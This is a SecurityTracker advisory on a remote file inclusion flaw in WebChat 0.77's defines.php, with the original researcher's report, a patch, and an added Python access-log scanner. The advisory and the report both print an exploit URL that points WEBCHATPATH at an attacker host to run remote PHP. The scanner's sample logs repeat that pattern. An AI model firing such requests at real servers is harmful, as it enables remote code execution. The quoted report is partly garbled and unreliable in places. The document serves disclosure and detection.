SecurityTracker.com
Category:   Application (Instant Messaging/IRC/Chat)  >   WebChat (webdev.ro)
Vendors:   Toma, Daniel
WebChat Include File Bug in 'defines.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1006193
SecurityTracker URL:  http://securitytracker.com/id/1006193
CVE Reference:   CVE-2007-0485
Updated:  Jul 7 2008
Original Entry Date:  Mar 3 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.77
Description:   An include file vulnerability was reported in WebChat. A remote user can execute arbitrary PHP code and operating system commands on the target server.

Frog-m@n reported that the 'defines.php' script includes the 'db_mysql.php' and 'language/english.php' files relative to the $WEBCHATPATH variable but does not validate that the included files are from the proper location. A remote user can specify a remote location for those include files, causing the target server to include and execute the remotely located files.

As an example, the following URL will cause the http://[attacker]/db_mysql.php file to be executed on the target server:

http://[target]/defines.php?WEBCHATPATH=http://[attacker]/

According to the report, this exploit is not possible unless the register_globals parameter is set to ON.
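
To check whether a server running WebChat 0.77 has received requests of the form shown above, the following added example (not part of the advisory or of the original report) scans access-log lines for a client-supplied WEBCHATPATH parameter. The log format (Apache combined style), the sample lines, and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined-log style (not from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [03/Mar/2003:10:00:01 +0000] "GET /webchat/defines.php?WEBCHATPATH=http://example.invalid/ HTTP/1.0" 200 512
192.0.2.11 - - [03/Mar/2003:10:00:05 +0000] "GET /webchat/defines.php?WEBCHATPATH=http%3A%2F%2Fexample.invalid%2F HTTP/1.0" 200 512
192.0.2.12 - - [03/Mar/2003:10:00:09 +0000] "GET /webchat/index.php?room=1 HTTP/1.0" 200 2048
192.0.2.13 - - [03/Mar/2003:10:00:12 +0000] "GET /webchat/defines.php?WEBCHATPATH=./ HTTP/1.0" 200 512
"""

# Client address and request target from one log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Generic URI scheme prefix as defined by RFC 3986 ("http:", and so on).
SCHEME_RE = re.compile(r'^[A-Za-z][A-Za-z0-9+.-]*:')


def classify(line):
    """Return (client, severity, value) if the request sets WEBCHATPATH, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    # parse_qs percent-decodes values, so URL-encoded forms are caught as well.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    values = params.get("WEBCHATPATH")  # PHP variable names are case-sensitive
    if not values:
        return None
    for value in values:
        if SCHEME_RE.match(value.strip()):
            return (client, "remote-include", value)
    # defines.php sets this variable itself, so any client-supplied value is suspect.
    return (client, "param-override", values[0])


def scan(log_text):
    """Classify every line of a log and keep only the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for client, severity, value in scan(SAMPLE_LOG):
        print(f"{severity:15} {client:12} WEBCHATPATH={value}")
```

With register_globals enabled, PHP also registers variables sent in a POST body or a cookie, and those do not appear in the request line, so this check covers query-string requests only.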

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target server. The code or commands will run with the privileges of the web server.
Solution:   No vendor solution was available at the time of this entry. The author of the report has issued an unofficial patch, available at:

http://www.phpsecure.info/

Vendor URL:  www.webdev.ro/products/webchat/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  WebChat


						WebChat
						*******
Information:
Language: PHP
Website: http://www.webdev.ro
Version: 0.77

Details:

The flaw is a fairly classic one.
In the file defines.php, we can see the following lines of code:
-----------------------------------------------
<?
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
include ($WEBCHATPATH.'db_mysql.php');
include ($WEBCHATPATH.'language/english.php');
[...]
-----------------------------------------------
We can therefore include and execute the files http://[attacker]/db_mysql.php and 
of the form:
http://[target]/defines.php?WEBCHATPATH=http://[attacker]/
server http://[target]
and with its rights and restrictions.
All of this is only possible if register_globals is set to ON.

Patch:
In defines.php, replace the lines:
-----------------------------
if (!isset($WEBCHATPATH)) {
	 $WEBCHATPATH = './';
}
-----------------------------
with:
--------------------
$WEBCHATPATH = './';
--------------------

Credits:
Author: frog-m@n
E-mail: frog-man@frog-man.org
Website: http://www.phpsecure.info
Date: 01/03/03


 
 



Copyright 2019, SecurityGlobal.net LLC